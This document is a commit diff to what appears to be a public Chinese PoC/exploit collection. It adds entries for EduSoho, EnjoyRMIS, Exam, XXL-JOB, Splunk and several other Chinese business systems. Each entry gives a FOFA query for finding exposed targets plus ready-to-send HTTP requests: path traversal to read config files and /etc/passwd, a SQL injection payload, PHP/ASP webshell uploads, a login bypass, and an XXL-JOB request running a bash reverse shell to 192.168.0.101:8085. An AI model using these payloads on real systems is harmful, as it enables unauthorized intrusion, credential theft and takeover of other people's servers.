7.9更新漏洞

EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞.md

@@ -0,0 +1,25 @@
+## EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞
+
+EduSoho 教培系统是由杭州阔知网络科技研发的开源网校系统。EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞，未授权的攻击者可通过该漏洞读取敏感文件如app/config/parameters.yml，获取系统数据库账号密码，应用密钥等敏感信息。
+
+## fofa
+
+```
+body="Powered By EduSoho" || body="www.edusoho.com"
+```
+
+## poc
+
+```
+GET /export/classroom-course-statistics?fileNames[]=../../../config/parameters.yml HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=2vtqc388p6rhcueiipc5l97jtg
+Upgrade-Insecure-Requests: 1
+```
+
+![image-20240707200131136](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072001203.png)

EnjoyRMIS-GetOAById存在SQL注入漏洞.md

@@ -0,0 +1,30 @@
+## EnjoyRMIS-GetOAById存在SQL注入漏洞
+
+  EnjoyRMIS GetOAById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+## fofa
+
+```
+body="CheckSilverlightInstalled"
+```
+
+## poc
+
+```yaml
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOAById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOAById xmlns="http://tempuri.org/">
+      <sId>string' AND 8448 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8448=8448) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'OFyo'='OFyo</sId>
+    </GetOAById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20240707203405896](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072034047.png)

Exam在线考试系统存在前台任意文件上传漏洞.md

@@ -0,0 +1,47 @@
+## Exam在线考试系统存在前台任意文件上传漏洞
+
+Exam在线考试系统是一种现代地，全新的考试模型。它使用户可根据自身特点快速构建考试、测评、练习、竞赛、调查、分析及管理于一体的网络化考试平台，可轻松完成全员考试，问卷调查以及知识竞赛等工作，uploadFile接口存在任意文件上传漏洞，导致获取服务器权限。
+
+## fofa
+
+```
+"app/core/styles/js/jquery.min.js"
+```
+
+## poc
+
+```yaml
+POST /index.php?document-api-fineuploader HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Connection: keep-alive
+Content-Length: 198
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygfd0H3RWDeNNLaPy
+Host: 127.0.0.1
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/index.php?document-api-fineuploader
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
+sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+sec-fetch-user: ?1
+
+------WebKitFormBoundarye776qKJKlcGtVlH5
+Content-Disposition: form-data; name="qqfile"; filename="1.php"
+Content-Type: image/png
+
+<?php phpinfo();?>
+------WebKitFormBoundarye776qKJKlcGtVlH5--
+```
+
+![image-20240708111744898](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407081117994.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/KXcBpZ5rcdnHLey--NXQfg

README.md

@@ -1,6 +1,28 @@
 # 漏洞收集
 收集整理漏洞EXP/POC,大部分漏洞来源网络，目前收集整理了700多个poc/exp，善用CTRL+F搜索
 
+## 2024.07.09 新增漏洞
+
+- 申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞
+- EduSoho教培系统classropm-course-statistics存在任意文件读取漏洞
+- 深澜计费管理系统proxy存在任意文件读取漏洞
+- 深澜计费管理系统strategy存在反序列化RCE漏洞
+- 大唐电信NVS3000综合视频监控平台getDepResList存在SQL注入漏洞
+- 大唐电信AC集中管理平台敏感信息泄漏漏洞
+- 大唐电信NVS3000综合视频监控平台getencoderlist存在未授权访问漏洞
+- 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞
+- 中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞
+- 亿华人力资源管理系统unloadfile存在任意文件上传漏洞
+- EnjoyRMIS-GetOAById存在SQL注入漏洞
+- 亿渡留言管理系统uploadimg存在任意文件上传漏洞
+- 宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞
+- Exam在线考试系统存在前台任意文件上传漏洞
+- 彩票系统存在任意文件preview.php上传漏洞
+- 会捷通云视讯平台fileDownload存在任意文件读取漏洞
+- 正方数字化校园平台RzptManage存在任意文件写入漏洞
+- 鲸发卡系统自动发卡网request_post存在任意文件读取漏洞
+- 用友时空KSOA接口com.sksoft.bill.QueryService存在SQL注入漏洞
+
 ## 2024.07.06 新增漏洞
 
 - 宏景eHR人力资源管理系统接口getSdutyTree存在SQL注入漏洞

Splunk-Enterprise任意文件读取漏洞.md

@@ -26,6 +26,16 @@ Connection: close
 Accept-Encoding: gzip
 ```
 
+```yaml
+GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+```
+
 ## **nuclei poc**
 
 ```yaml

XXL-JOB默认accessToken身份绕过漏洞.md

@@ -1,12 +1,21 @@
 ## XXL-JOB默认accessToken身份绕过漏洞
 
+XXL-JOB是一款开源的分布式任务调度平台，用于实现大规模任务的调度和执行。该漏洞是由于XXL-JOB 在默认配置下，用于调度通讯的 accessToken 不是随机生成的，而是使用 application.properties 配置文件中的默认值，如果用户没有修改该默认值，攻击者可利用此绕过认证调用 executor，执行任意代码，导致远程代码执行。
 
 ## 漏洞影响
+
+```
+2.31< XXL-JOB <= 2.4.0
+```
+
+## fofa
+
 ```
-2.3.1和2.4
+"invalid request, HttpMethod not support" && port="9999"
 ```
 
 ## poc
+
 请求头加上XXL-JOB-ACCESS-TOKEN: default_token
 
 ```
@@ -30,19 +39,22 @@ Content-Length: 365
   "jobId": 1,
   "executorHandler": "demoJobHandler",
   "executorParams": "demoJobHandler",
-  "executorBlockStrategy": "SERIAL_EXECUTION",
+  "executorBlockStrategy": "COVER_EARLY",
   "executorTimeout": 0,
   "logId": 1,
   "logDateTime": 1586629003729,
-  "glueType": "GLUE_POWERSHELL",
-  "glueSource": "calc.exe",
+  "glueType": "GLUE_SHELL",
+  "glueSource": "bash -i >& /dev/tcp/192.168.0.101/8085 0>&1",
   "glueUpdatetime": 1586699003758,
   "broadcastIndex": 0,
   "broadcastTotal": 0
 }
 ```
 
+![image-20240706142307631](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407061423702.png)
+
 ## 漏洞复现
+
 ```
 https://mp.weixin.qq.com/s/9vcIRCbKyisFq3vPXmiMkQ
 https://www.cnblogs.com/chm0d/p/17805168.html

中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞.md

@@ -0,0 +1,18 @@
+## 中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞
+
+中科智远科技-综合监管云平台 /Download/DownFile 存在任意文件读取漏洞，读取数据库配置文件导致数据泄露。
+
+
+## fofa
+
+```
+icon_hash="-227059202"
+```
+
+## poc
+
+```
+/Download/DownFile?fileName=../web.config
+```
+
+![image-20240707202558023](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072025096.png)

亿华人力资源管理系统unloadfile存在任意文件上传漏洞.md

@@ -0,0 +1,41 @@
+## 亿华人力资源管理系统unloadfile存在任意文件上传漏洞
+
+亿华人力资源管理系统unloadfile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+## fofa
+
+```
+body="亿华人力资源管理系统"
+```
+
+## poc
+
+```yaml
+POST /handle/unloadfile.ashx HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------21909179191068471382830692394
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------21909179191068471382830692394
+Content-Disposition: form-data; name="file"; filename="stc.asp"
+Content-Type: image/jpeg
+
+test
+-----------------------------21909179191068471382830692394
+Content-Disposition: form-data; name="action"
+
+unloadfile
+-----------------------------21909179191068471382830692394
+Content-Disposition: form-data; name="filepath"
+
+./
+-----------------------------21909179191068471382830692394—
+```
+
+![image-20240707203045130](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072030195.png)

亿渡留言管理系统uploadimg存在任意文件上传漏洞.md

@@ -0,0 +1,40 @@
+## 亿渡留言管理系统uploadimg存在任意文件上传漏洞
+
+亿渡留言管理系统uploadimg存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+## fofa
+
+```
+body="/images/logo/logo140x38.png"
+```
+
+## poc
+
+```yaml
+POST /plugins/upload/uploadimg.php?fp=upimg HTTP/1.1
+Host: 
+Content-Length: 197
+sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypvPqblfrUine6bl3
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+sec-ch-ua-platform: "Windows"
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: userid=1; PHPSESSID=ov8kb5g3n4gng3lfskbnpbch37; Hm_lvt_448f02fca78a892e6d9c5f1c599ff906=1711623626; Hm_lpvt_448f02fca78a892e6d9c5f1c599ff906=1711623626
+Connection: close
+
+------WebKitFormBoundarypvPqblfrUine6bl3
+Content-Disposition: form-data; name="file"; filename="a.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundarypvPqblfrUine6bl3--
+```
+
+![image-20240707203825373](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072038514.png)

会捷通云视讯平台fileDownload存在任意文件读取漏洞.md

@@ -0,0 +1,27 @@
+## 会捷通云视讯平台fileDownload存在任意文件读取漏洞
+
+## fofa
+
+```
+body="/him/api/rest/v1.0/node/role
+```
+
+## poc
+
+```
+POST /fileDownload?action=downloadBackupFile HTTP/1.1
+Host: x.x.x.x
+Content-Length: 20
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: */*
+Origin: http://x.x.x.x
+Referer: http://x.x.x.x
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5
+Connection: close
+ 
+fullPath=/etc/passwd
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407081228835.png)

厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞.md

@@ -0,0 +1,21 @@
+## 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞
+
+厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞，可直接绕过登录进入后台。
+
+## fofa
+
+```
+body="/monitor/realt/init?curPageId=a1"
+```
+
+## poc
+
+```
+/mgrcter/usermgr/user/Login.action
+```
+
+![image-20240707202135740](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072021787.png)
+
+返回登录页面刷新一下进后台。
+
+![image-20240707202157609](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072021698.png)

大唐电信AC集中管理平台敏感信息泄漏漏洞.md

@@ -0,0 +1,26 @@
+## 大唐电信AC集中管理平台敏感信息泄漏漏洞
+
+大唐电信科技股份有限公司是电信科学技术研究院（大唐电信科技产业集团）控股的的高科技企业，大唐电信已形成集成电路设计、软件与应用、终端设计、移动互联网四大产业板块。大唐电信AC集中管理平台存在敏感信息泄漏漏洞。攻击者利用此漏洞可获取大唐电信AC终端管理平台控制的网关敏感信息。
+
+## fofa
+
+```
+app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ=="
+```
+
+## poc
+
+```
+GET /actpt.data HTTP/1.1
+Host: xx.xx.xx.xx
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072013575.png)